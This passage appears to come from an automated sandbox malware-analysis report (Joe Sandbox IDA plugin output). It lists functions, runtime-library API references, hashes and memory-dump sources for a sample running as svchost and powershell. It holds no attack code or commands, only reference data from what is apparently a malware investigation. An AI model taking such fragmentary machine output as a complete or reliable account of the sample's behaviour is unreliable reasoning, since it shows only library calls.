                                      • Instruction Fuzzy Hash: 440181B0E4420CBBDF10AFF09C0DBDE7B789B04709F1040BAE501B22E1D6785644DB6A
                                      APIs
                                      • _malloc.LIBCMT ref: 00413BD7
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • _free.LIBCMT ref: 00413BEA
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocHeap_free_malloc
                                      • String ID:
                                      • API String ID: 2734353464-0
                                      APIs
                                      • __getptd.LIBCMT ref: 00410323
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 0041033A
                                      • __amsg_exit.LIBCMT ref: 00410348
                                      • __lock.LIBCMT ref: 00410358
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041036C
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 0040452F
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404569
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: invalid string position$string too long
                                      • API String ID: 963545896-4289949731
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __aulldiv__aullrem_memset
                                      • String ID:
                                      • API String ID: 2330243113-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      APIs
                                      • _malloc.LIBCMT ref: 0040EFEB
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • std::exception::exception.LIBCMT ref: 0040F020
                                      • std::exception::exception.LIBCMT ref: 0040F03A
                                      • __CxxThrowException@8.LIBCMT ref: 0040F04B
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                      • String ID:
                                      • API String ID: 1414122017-0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: d
                                      • API String ID: 2102423945-2564639436
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 004048FF
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                        • Part of subcall function 004049F0: std::_Xinvalid_argument.LIBCPMT ref: 00404A40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: +H@$invalid string position
                                      • API String ID: 963545896-1930875418
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: _b@$_b@
                                      • API String ID: 2102423945-1016703337
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: p@$p@
                                      • API String ID: 0-369813981
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404B09
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • _memmove.LIBCMT ref: 00404B88
                                      Strings
                                      • invalid string position, xrefs: 00404B04
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                      • String ID: invalid string position
                                      • API String ID: 1785806476-1799206989
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: 5$EOS
                                      • API String ID: 909875538-1935795245
                                      APIs
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147B0
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147C0
                                      • __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00416014
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: csm
                                      • API String ID: 803148776-1018135373

                                      Control-flow Graph (legend: Executed / Not Executed)
                                      [graph rendering omitted: basic blocks 7ffd9baab1c8 through 7ffd9baaba1a; the block at 7ffd9baab9b9 calls LoadLibraryExW]
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1958771929.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ffd9baa0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:

                                      Control-flow Graph (legend: Executed / Not Executed)
                                      [graph rendering omitted: basic blocks 7ffd9baab2f8 through 7ffd9baaba1a; the block at 7ffd9baab9b9 calls LoadLibraryExW]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1958771929.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ffd9baa0000_powershell.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0

                                      Control-flow Graph (graph image not extracted): basic blocks 7ffd9baab934-7ffd9baaba1a; calls LoadLibraryExW
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1958771929.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ffd9baa0000_powershell.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0